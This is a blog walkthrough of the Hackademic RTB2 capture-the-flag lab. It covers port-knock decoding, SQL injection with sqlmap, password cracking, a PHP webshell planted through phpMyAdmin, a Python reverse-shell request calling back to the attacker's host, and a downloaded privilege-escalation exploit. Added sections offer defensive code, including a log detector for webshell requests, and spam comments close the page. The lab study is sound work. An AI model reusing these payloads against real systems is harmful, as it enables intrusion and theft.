The Art of Webshell and Port Knocking Exploit — Hackademic RTB2

As I was browsing for webshell exploits through Google, I found an interesting challenge on Vulnhub: Hackademic RTB2 by mr.pr0n, released on 6 September 2011. Hackademic RTB2 is one of a CTF series named Hackademic by mr.pr0n on Vulnhub. Actually, there is a first one, Hackademic RTB1. Nevertheless, I chose the second one first, hahahahaa. But I promise I will post about Hackademic RTB1 next week.

Generally, Hackademic RTB2 focuses on how we can apply both webshell exploitation and the port knocking concept. Kali Linux, especially Kali-rolling3, ships webshell scripts by default: PHP, ASP, ASPX, CFM, JSP and Perl based scripts. Webshell exploits can also be found among the Metasploit modules. According to Wikipedia, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific port(s). A variant called single packet authorization exists, where only a single "knock" is needed, consisting of an encrypted packet. The port "knock" itself is similar to a secret handshake and can consist of any number of TCP, UDP or even sometimes ICMP and other protocol packets to numbered ports on the destination machine.

I think that preliminary was confusing enough, hahaha. Let's jump to the practice: how to "capture the flag", the objective of Hackademic RTB2.

PREPARATION

  • Download the virtual machine image of Hackademic RTB2 via this link.
  • Open Hackademic RTB2 in VMware and choose "I Moved It", so that the machine brings up its network interface automatically without us having to log in first.
  • In this case, I used Kali Linux version 3 as the attacker machine.

INFORMATION GATHERING

First, find the target machine on the network. I used Netdiscover to search for the active hosts on the network and did a simple analysis of which one was the victim machine.

After I found the target machine, whose MAC vendor was VMware, Inc. and whose IP address was 192.168.0.110, I fired up the port scanner Nmap to look for the open ports and the services running on the machine.

Based on the result of the Nmap scan above, we learned that the machine had a web service on port 80 and an unknown service on port 666. I checked the web service in a web browser to find out what it was serving.

The web page looked like a login page or something similar. I scanned it with WhatWeb to find out which CMS the web application used.

WhatWeb did not reveal which CMS the web application used. So I searched for directories on the web service using DirBuster, hoping to find something interesting about the web application.

DirBuster showed me that the web application had a phpMyAdmin page, but it was filtered. So I tried the simple boolean SQL injection string " or 1=1--' " in the username and password fields of the check page.

It showed an interesting page of messages, so I checked the web page source, and then ...

It gave a long encoded string like the one below (it is percent-encoded, which is why a URL decoder is the right first tool):

%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A

Then I decoded the string using the online decoder http://urldecoder.org, like below:

Fortunately, I got a hex string from the decoder. So I checked what message the hex string held by decoding it into an ASCII string, like below:

Finally, I got the clue about this challenge. It was port knocking, certainly for port 666, which was filtered. After that, the binary string was decoded into ASCII to find what packet sequence was hidden in it.

Evidently, the sequence to be sent, in order to make SYN connections and open port 666, was 1001:1101:1011:1001. Next, I made a bash script that sends a SYN to each port of that sequence with netcat.
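As an added example (my own code, not from the original post or the challenge), here is a Python decoder that peels the three layers of the hidden string in one pass: percent-encoding, then space-separated hex bytes, then lines of 8-bit ASCII binary groups. It chunks the bits eight at a time instead of splitting on whitespace, so groups whose separating space was lost (the page's string has two groups run together at the start of its binary line) still decode. The sample input is a constructed fragment in the same format, not the page's full string, and the layer_encode helper exists only to build more test data.

```python
from urllib.parse import unquote
import re


def looks_binary(line):
    """True for a line made only of 0/1 characters and whitespace that holds whole bytes."""
    bits = "".join(line.split())
    return bool(bits) and set(bits) <= {"0", "1"} and len(bits) % 8 == 0


def binary_groups_to_text(line):
    """Turn a line of 8-bit ASCII groups into the characters those bytes spell.

    Whitespace is dropped first and the bits are chunked eight at a time, so a
    fused pair such as "0011000100110000" still yields "10".
    """
    bits = "".join(line.split())
    if len(bits) % 8:
        raise ValueError("bit string is not a whole number of bytes")
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))


def decode_clue(encoded):
    """Peel the three layers of the hidden string.

    1. percent-encoding          ("%33%63" -> "3c")
    2. space-separated hex bytes ("3c 2d"  -> "<-")
    3. lines of ASCII binary groups -> the characters they encode
    Other lines pass through unchanged; CRLF line endings become "\\n".
    """
    hex_text = unquote(encoded)
    # bytes.fromhex() ignores ASCII whitespace between byte pairs (Python 3.7+).
    ascii_text = bytes.fromhex(hex_text).decode("ascii")
    out = []
    for line in ascii_text.splitlines():
        out.append(binary_groups_to_text(line) if looks_binary(line) else line)
    return "\n".join(out)


def layer_encode(text):
    """Forward direction of the same three layers; used here only to build test data."""
    lines = []
    for line in text.splitlines(keepends=True):
        body = line.rstrip("\r\n")
        ending = line[len(body):]
        if body and re.fullmatch(r"[01:]+", body):
            body = " ".join(format(ord(c), "08b") for c in body)
        lines.append(body + ending)
    hex_text = " ".join(f"{b:02x}" for b in "".join(lines).encode("ascii"))
    # Percent-encode every character, letters and digits included, as the page's string does.
    return "".join(f"%{ord(c):02x}" for c in hex_text)


# Constructed fragment in the page's exact format: "Knock\r\n" followed by one line
# of binary groups spelling "1001" (bytes 4b 6e 6f 63 6b 0d 0a 30 30 31 31 30 30 30 31 ...).
KNOCK = "%34%62%20%36%65%20%36%66%20%36%33%20%36%62"   # "4b 6e 6f 63 6b" -> "Knock"
CRLF = "%30%64%20%30%61"                              # "0d 0a"
ONE = "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31"   # "00110001" -> "1"
ZERO = "%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30"  # "00110000" -> "0"
SPACE = "%32%30"                                      # "20" -> " "
SAMPLE = "%20".join([KNOCK, CRLF, ONE, SPACE, ZERO, SPACE, ZERO, SPACE, ONE, CRLF])

if __name__ == "__main__":
    print(decode_clue(SAMPLE))
    print(decode_clue(layer_encode("<--------->\r\nKnock Knock\r\n1001:1101:1011:1001\r\n")))
```

Feeding the page's full string to decode_clue gives the banner, the "Knock Knock Knockin' on heaven's door" line and the port sequence, which is exactly what the manual three-step decoding above recovered.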

Then I saved the script as hackademy.sh. Next, I ran the script, but its permissions had to be changed to 755 first.

After that, I scanned the machine with Nmap to check whether port 666 had been opened.
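To show the server side that the knock script is talking to, here is an added example (not the challenge's own knock daemon or its configuration) of the state machine a knock daemon runs over firewall log events: it tracks each source address's progress through the sequence, resets on a wrong port or a too-slow knock, and opens the protected port for that address for a limited time. The iptables-style log lines, the 10-second knock timeout, the 30-second open window and the host addresses are all constructed; the four-port sequence is the one recovered above.

```python
import re
from dataclasses import dataclass, field

# Constructed policy (assumed, not the challenge's real configuration):
# the four-port sequence from the clue, guarding port 666.
KNOCK_SEQUENCE = (1001, 1101, 1011, 1001)
PROTECTED_PORT = 666
KNOCK_TIMEOUT = 10     # seconds allowed between two consecutive knocks
OPEN_FOR = 30          # seconds the protected port stays open for a successful knocker

# iptables LOG-style line (constructed format): syslog timestamp ... SRC=... DPT=...
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} (?P<h>\d\d):(?P<m>\d\d):(?P<s>\d\d)) "
    r".*?\bSRC=(?P<src>\S+) .*?\bDPT=(?P<dpt>\d+)"
)


def parse_event(line):
    """Return (seconds_of_day, source_ip, destination_port), or None for non-matching lines."""
    m = LOG_RE.search(line)
    if not m:
        return None
    seconds = int(m["h"]) * 3600 + int(m["m"]) * 60 + int(m["s"])
    return seconds, m["src"], int(m["dpt"])


@dataclass
class KnockDaemon:
    sequence: tuple = KNOCK_SEQUENCE
    timeout: float = KNOCK_TIMEOUT
    open_for: float = OPEN_FOR
    progress: dict = field(default_factory=dict)   # src -> (next index, time of last knock)
    opened: dict = field(default_factory=dict)     # src -> time at which access expires

    def knock(self, ts, src, dport):
        """Feed one SYN to a closed port; return True when it completes the sequence."""
        idx, last = self.progress.get(src, (0, ts))
        if ts - last > self.timeout:
            idx = 0                      # too slow: the partial sequence is forgotten
        if dport == self.sequence[idx]:
            idx += 1                     # the expected next port
        elif dport == self.sequence[0]:
            idx = 1                      # wrong port, but it may start a fresh sequence
        else:
            idx = 0                      # wrong port (a port sweep lands here): reset
        if idx == len(self.sequence):
            self.opened[src] = ts + self.open_for
            self.progress.pop(src, None)
            return True
        self.progress[src] = (idx, ts)
        return False

    def is_open(self, ts, src):
        """Would a packet from src to the protected port be accepted at time ts?"""
        return self.opened.get(src, -1) > ts


def replay(lines, daemon=None):
    """Run log lines through the daemon; return (daemon, list of (ts, src) that opened the port)."""
    daemon = daemon or KnockDaemon()
    opened = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue
        ts, src, dport = event
        if daemon.knock(ts, src, dport):
            opened.append((ts, src))
    return daemon, opened


# Constructed log lines: a correct knock, a wrong-order knock, and a knock that is too slow.
LOG_LINES = [
    "Jan  1 10:00:01 gw kernel: KNOCK: IN=eth0 SRC=192.168.0.5 DST=192.168.0.110 PROTO=TCP DPT=1001 SYN",
    "Jan  1 10:00:02 gw kernel: KNOCK: IN=eth0 SRC=192.168.0.5 DST=192.168.0.110 PROTO=TCP DPT=1101 SYN",
    "Jan  1 10:00:03 gw kernel: KNOCK: IN=eth0 SRC=192.168.0.5 DST=192.168.0.110 PROTO=TCP DPT=1011 SYN",
    "Jan  1 10:00:04 gw kernel: KNOCK: IN=eth0 SRC=192.168.0.5 DST=192.168.0.110 PROTO=TCP DPT=1001 SYN",
    "Jan  1 10:00:05 gw kernel: KNOCK: IN=eth0 SRC=192.168.0.7 DST=192.168.0.110 PROTO=TCP DPT=1001 SYN",
    "Jan  1 10:00:06 gw kernel: KNOCK: IN=eth0 SRC=192.168.0.7 DST=192.168.0.110 PROTO=TCP DPT=1011 SYN",
    "Jan  1 10:00:07 gw kernel: KNOCK: IN=eth0 SRC=192.168.0.7 DST=192.168.0.110 PROTO=TCP DPT=1101 SYN",
    "Jan  1 10:00:08 gw kernel: KNOCK: IN=eth0 SRC=192.168.0.7 DST=192.168.0.110 PROTO=TCP DPT=1001 SYN",
    "Jan  1 10:01:00 gw kernel: KNOCK: IN=eth0 SRC=192.168.0.9 DST=192.168.0.110 PROTO=TCP DPT=1001 SYN",
    "Jan  1 10:01:30 gw kernel: KNOCK: IN=eth0 SRC=192.168.0.9 DST=192.168.0.110 PROTO=TCP DPT=1101 SYN",
    "Jan  1 10:01:31 gw sshd[123]: unrelated line",
]

if __name__ == "__main__":
    daemon, opened = replay(LOG_LINES)
    for ts, src in opened:
        print(f"t={ts}: port {PROTECTED_PORT} opened for {src} until t={ts + OPEN_FOR}")
```

Two things this model makes visible. The firewall must log SYNs to every closed port, not just the four in the sequence, so that an Nmap sweep resets the state instead of walking through it. And the sequence is a shared secret with no other protection: here it was left in the page source behind a trivial login bypass, so the knock added nothing, and the single packet authorization variant the introduction mentions exists precisely because a plain knock can be sniffed and replayed.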

After I opened the port's service in a web browser, it showed the main web page and we learned that the CMS the website used was Joomla.

open web through port 666

Then I used the Joomscan tool in Metasploit to find and scan the vulnerable aspects of the web application, like below.

According to the image above, I set several parameters such as the IP address of the victim web application and the service port of the application. Then I fired up the tool by typing run.

The result said that the web application had a SQL injection vulnerability at the URL /index.php?option=com_abc&view=abc&letter=AS&sectionid='. To make sure and verify the vulnerable URL, I checked it in the web browser like below.

The response showed that the web application was certainly vulnerable. Then I exploited the SQL injection with sqlmap to reveal and extract the databases and the tables, including values such as credential strings, by typing sqlmap -u "http://192.168.0.110:666/index.php?option=com_abc&view=abc&letter=AS&sectionid='" --dbs
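The sectionid=' probe works because the component pastes the parameter into the SQL text, so a stray quote breaks the statement (an error response) and a boolean condition changes which rows come back. The added example below (my code, not Joomla's, using SQLite in place of MySQL and a constructed jos_sections table) puts that vulnerable pattern beside the parameterized form; the probe helper returns the two kinds of response the browser test above distinguishes.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the Joomla database: a tiny jos_sections table in memory."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE jos_sections (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO jos_sections VALUES (1, 'News'), (2, 'About');
    """)
    return conn


def lookup_vulnerable(conn, sectionid):
    """The pattern behind sectionid=' : the parameter is pasted into the SQL text."""
    sql = "SELECT title FROM jos_sections WHERE id = '" + sectionid + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, sectionid):
    """Same query with a bound parameter: the value can never change the statement's shape."""
    sql = "SELECT title FROM jos_sections WHERE id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (sectionid,))]


def probe(lookup, conn, value):
    """Return ('ok', rows) or ('error', message): the two responses the browser test shows."""
    try:
        return "ok", lookup(conn, value)
    except sqlite3.Error as exc:
        return "error", str(exc)


if __name__ == "__main__":
    db = build_db()
    for value in ("1", "'", "1' OR '1'='1"):
        print(repr(value),
              "vulnerable:", probe(lookup_vulnerable, db, value),
              "parameterized:", probe(lookup_parameterized, db, value))
```

With the bound parameter the quote and the OR clause are just a value that matches no id, which is also why an error page that changes with the input is the first thing to look for when reviewing such a component.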

I chose the joomla database, because I thought it was the website's database. So I ran sqlmap -u "http://192.168.0.110:666/index.php?option=com_abc&view=abc&letter=AS&sectionid='" -D joomla --tables to reveal the tables in the database.

The most interesting table was jos_users. It might contain the credentials for the application. Then I ran sqlmap to reveal its columns by typing sqlmap -u "http://192.168.0.110:666/index.php?option=com_abc&view=abc&letter=AS&sectionid='" -D joomla -T jos_users --columns

I was right, so I continued to extract the credentials stored in the username and password columns. The sqlmap command for extracting those credentials was sqlmap -u "http://192.168.0.110:666/index.php?option=com_abc&view=abc&letter=AS&sectionid='" -D joomla -T jos_users -C username,password,usertype --dump

The credentials which hashcat cracked successfully were JSmith's password and BTallor's password. The wordlist I used was rockyou.txt, which is stored by default in Kali 3.

hashcat -m 11 -a 0 pass-hash-hackademy.txt /usr/share/wordlists/rockyou.txt --force

Remember that sqlmap has a special option, --os-shell. It prompts for an interactive operating system shell, so we can run commands on the target's operating system. In this context the victim was Ubuntu, so by applying the --os-shell option I could run an Ubuntu command shell.

sqlmap -u "http://192.168.0.110:666/index.php?option=com_abc&view=abc&letter=AS&sectionid='" --os-shell

After I enumerated the files stored in the working directory, I found the file "configuration.php". As we know, configuration.php is used to store credential parameters for the system's settings. So I checked its content like below.

And wow, the file held credential information in plaintext strings. I found the credentials for MySQL. So I verified the credentials by logging into phpMyAdmin with a web browser.

The misuse by the programmer was using root as the phpMyAdmin username and storing the credentials in plaintext. So I could run a SQL statement through phpMyAdmin to create a malicious web script.

The images above showed that creating a web script with a SQL command in phpMyAdmin succeeded. So I made a PHP payload, known as a webshell, by typing SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/cmd.php"

Then I requested the URL 192.168.100.6:666/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.100.5%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

And I set up a listener on port 443 to catch the session.
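From the defender's side, the request that carried the reverse shell is sitting in the web server's access log. Here is an added example (my code, not from the post) of a small Python detector over Apache combined-format lines: it decodes each query string, flags command-style parameter names and shell tokens in the values, and pulls out the connect-back address and port for the incident notes. The log lines are constructed; the third one carries the same URL the post requests above. The parameter-name and token lists are my assumptions, not a vendor signature.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache combined/common log line (constructed format for this example).
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Parameter names typically used by one-line webshells (an assumption, not a vendor list).
SHELL_PARAMS = {"cmd", "c", "exec", "command", "shell"}
# Fragments that mean "run something" rather than "look something up".
SHELL_TOKENS = ("/bin/sh", "/bin/bash", "bash -i", "python -c", "perl -e", "socket.socket",
                "os.dup2", "subprocess", "nc -e", "wget ", "curl ", "base64 -d")
# The connect-back target inside a Python reverse shell: s.connect(("host", port))
CALLBACK_RE = re.compile(r'connect\(\(\s*"(?P<host>[^"]+)"\s*,\s*(?P<port>\d+)\s*\)\)')


def parse_query(query):
    """Split a query string on '&' only; the one-liner uses ';' inside its value."""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def inspect_request(line):
    """Return an alert dict for a suspicious request, or None."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    reasons, tokens, callback = [], [], None
    for name, value in parse_query(target.query):
        if name.lower() in SHELL_PARAMS:
            reasons.append(f"command-style parameter '{name}'")
        hits = [t for t in SHELL_TOKENS if t in value]
        if hits:
            reasons.append(f"shell tokens in '{name}'")
            tokens.extend(hits)
        cb = CALLBACK_RE.search(value)
        if cb:
            callback = (cb["host"], int(cb["port"]))
    if not reasons:
        return None
    return {"src": m["src"], "time": m["time"], "path": target.path,
            "reasons": reasons, "tokens": tokens, "callback": callback}


def scan(lines):
    """Alerts for every suspicious line, in log order."""
    return [alert for alert in (inspect_request(line) for line in lines) if alert]


# Constructed access log: a normal CMS request, a first probe of the webshell,
# the reverse-shell request from the post, and an unrelated static file.
LOG_LINES = [
    '192.168.100.5 - - [01/Jan/2017:10:00:00 +0000] "GET /index.php?option=com_abc&view=abc&letter=AS HTTP/1.1" 200 5123',
    '192.168.100.5 - - [01/Jan/2017:10:00:05 +0000] "GET /cmd.php?cmd=id HTTP/1.1" 200 51',
    '192.168.100.5 - - [01/Jan/2017:10:00:09 +0000] "GET /cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.100.5%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27 HTTP/1.1" 200 0',
    '192.168.100.9 - - [01/Jan/2017:10:00:12 +0000] "GET /images/logo.png HTTP/1.1" 200 8192',
]

if __name__ == "__main__":
    for alert in scan(LOG_LINES):
        print(alert["time"], alert["src"], alert["path"], "->", "; ".join(alert["reasons"]),
              "callback:", alert["callback"])
```

Detection is the last line here. The chain that made the request possible is the thing to fix: a root account reachable through phpMyAdmin, a database user holding the FILE privilege with secure_file_priv unset so INTO OUTFILE can write into the web root, a web root the database server may write to, and outbound 443 allowed from the web server so the callback gets through.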

I had gotten the session, but I did not get root privileges. So I had to run a local exploit to get root access. Then I searched for a local exploit in my Kali 3 by typing cat files.csv | grep "linux,local" | grep -i "privilege escalation" | grep 2.6.3

I found a local exploit for the victim: 14814.c

So that I could download the local exploit onto the victim, I copied it into /var/www/html/ on my Kali 3, then changed its permissions to 755. After that, through the session, I downloaded the local exploit with wget.

Finally, I succeeded in escalating privileges to root. For the second objective, I searched for Key.txt in root's working directory.

First, I checked the contents of the file with cat.

The file showed base64-encoded strings. So I decoded the string.

After decoding the string, I got information explaining the file type. The file type was PNG. Then I downloaded the file to Kali 3 to open it and see what the image was.


28 thoughts on "The Art of Webshell and Port Knocking Exploit — Hackademic RTB2"

  1. Does your website have a contact page? I’m having a tough time locating it but, I’d like to send you an e-mail. I’ve got some ideas for your blog you might be interested in hearing. Either way, great website and I look forward to seeing it grow over time.

  2. I’ll immediately seize your rss as I can’t find your email subscription hyperlink or newsletter service. Do you have any? Please allow me recognize so that I may subscribe. Thanks.

  3. Wow, superb blog layout! How lengthy have you ever been blogging for? you make running a blog glance easy. The full look of your web site is magnificent, as smartly as the content material!

  4. Terrific paintings! That is the kind of information that are supposed to be shared across the web. Disgrace on the seek engines for no longer positioning this post upper! Come on over and talk over with my website . Thanks =)

  5. I do agree with all of the ideas you’ve offered to your post. They are really convincing and can certainly work. Still, the posts are very short for beginners. May you please prolong them a little from next time? Thanks for the post.

  6. Hello There. I found your blog using msn. This is a very neatly written article. I’ll make sure to bookmark it and return to learn extra of your helpful information. Thanks for the post. I’ll certainly return.

  7. It’s actually a cool and useful piece of info.
    I am satisfied that you simply shared this useful info with us.
    Please keep us informed like this. Thanks for sharing.

  8. Have you ever considered creating an e-book or guest authoring on other websites? I have a blog centered on the same topics you discuss and would really like to have you share some stories/information. I know my subscribers would value your work. If you are even remotely interested, feel free to send me an email.
